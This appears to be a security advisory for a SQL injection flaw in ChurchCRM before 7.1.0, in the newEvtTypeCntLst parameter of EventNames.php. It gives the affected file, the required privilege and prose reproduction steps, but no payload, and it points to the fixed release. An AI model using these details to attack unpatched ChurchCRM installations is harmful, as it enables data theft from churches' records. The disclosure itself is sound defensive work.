ChurchCRM SQL Injection Vulnerability in Event Type Creation

A SQL injection vulnerability exists in ChurchCRM versions prior to 7.1.0, specifically in the EventNames.php file. Authenticated users with AddEvent privileges can exploit this vulnerability by injecting SQL through the newEvtTypeCntLst parameter while creating event types. The issue arises because unescaped user input is directly interpolated into an SQL query that uses the ON DUPLICATE KEY UPDATE clause. This vulnerability allows for SQL execution manipulation, with the potential for timing-based exploitation and, depending on the database configuration, possible extraction of sensitive information.

Impact

Exploitation of this vulnerability allows for authenticated SQL injection, with confirmed manipulation of SQL queries and the potential for timing-based attacks. Depending on the database mode and payload used, there could be further impacts on data confidentiality and integrity.

Reproduction

To reproduce this vulnerability, an authenticated user with AddEvent privileges can create a new event through the EventNames.php page. After logging in, the user must assign themselves the necessary privileges if they do not already have them. Once on the EventNames.php page, the user can inject SQL payloads into the newEvtTypeCntLst parameter. After the event is saved, the injected SQL will be executed, demonstrating the vulnerability.

Remediation

Users should update to ChurchCRM version 7.1.0 or later, where this vulnerability has been fixed.